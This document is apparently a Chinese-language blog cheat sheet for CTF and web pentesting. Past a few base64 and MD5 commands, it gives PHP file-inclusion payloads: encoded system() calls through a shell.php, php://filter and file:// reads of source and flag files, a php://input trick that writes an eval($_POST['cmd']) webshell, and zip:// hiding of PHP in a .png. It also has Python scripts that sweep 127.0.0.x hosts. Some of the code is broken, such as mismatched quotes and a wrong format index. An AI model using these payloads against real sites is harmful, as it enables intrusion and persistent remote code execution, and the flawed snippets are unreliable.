Base64加解密:
ubuntu@VM-0-5-ubuntu:~$ echo iloveyou | base64
aWxvdmV5b3UK
ubuntu@VM-0-5-ubuntu:~$ echo aWxvdmV5b3UK | base64 -d
iloveyou
MD5加解密:
ubuntu@VM-0-5-ubuntu:~$ openssl
OpenSSL> md5
iloveyou #這里按三次ctrl+d
(stdin)= f25a2fc72690b780b2a14e140ef6a9e0
文件包含讀取文件:
shell.php?s=system(base64_decode("ZGlyIEQ6Cg=="));
通過偽協議讀取文件:php://filter/convert.base64-encode/resource=index.php
也可以直接利用file協議:http://127.0.0.1/test.php?file=file://C:\temp\flag.txt
通過偽協議寫文件:file.php?file=php://input 然后POST:<?php fputs(fopen(“shell.php”,”w”),’<?php eval($_POST["cmd"];?>’);?>即可生成webshell
ZIP://1.png%231.php #把1.php壓縮為1.rar然后改后綴為1.png,然后可以通過zip協議讀取壓縮包里得馬
把文件讀取的命令全改名了。
Urllib GET、POST請求腳本:
POST:
#-*- coding:utf-8 -*- #09.urllib2_post.py import urllib import urllib2 #POST請求的目標URL for i in range(1,255): url = "http://127.0.0.{1}/1.php".format(str(i)) headers = {"User-Agent":"Mozilla...."} formate = { "f":"flag", } data = urllib.urlencode(formate) request = urllib2.Request(url, data=data, headers = headers) response = urllib2.urlopen(request) print(response.read())
GET:
#!/usr/bin/env python # encoding: utf-8 import urllib import urllib2 for i in range(1,255): url = "http://127.0.0.{0}/1.php".format(str(i)) request = urllib2.Request(url=url) response =urllib2.urlopen(request,timeout=20) result = unicode(response.read()) print result
設置IP和掩碼
ifconfig eth0 192.168.5.40 netmask 255.255.255.0
設置網關
route add default gw 192.168.5.1
如果你覺得這篇文章對你有用你可以通過掃描下面的二維碼進行打賞。
——>微信<—— ——>支付寶<——
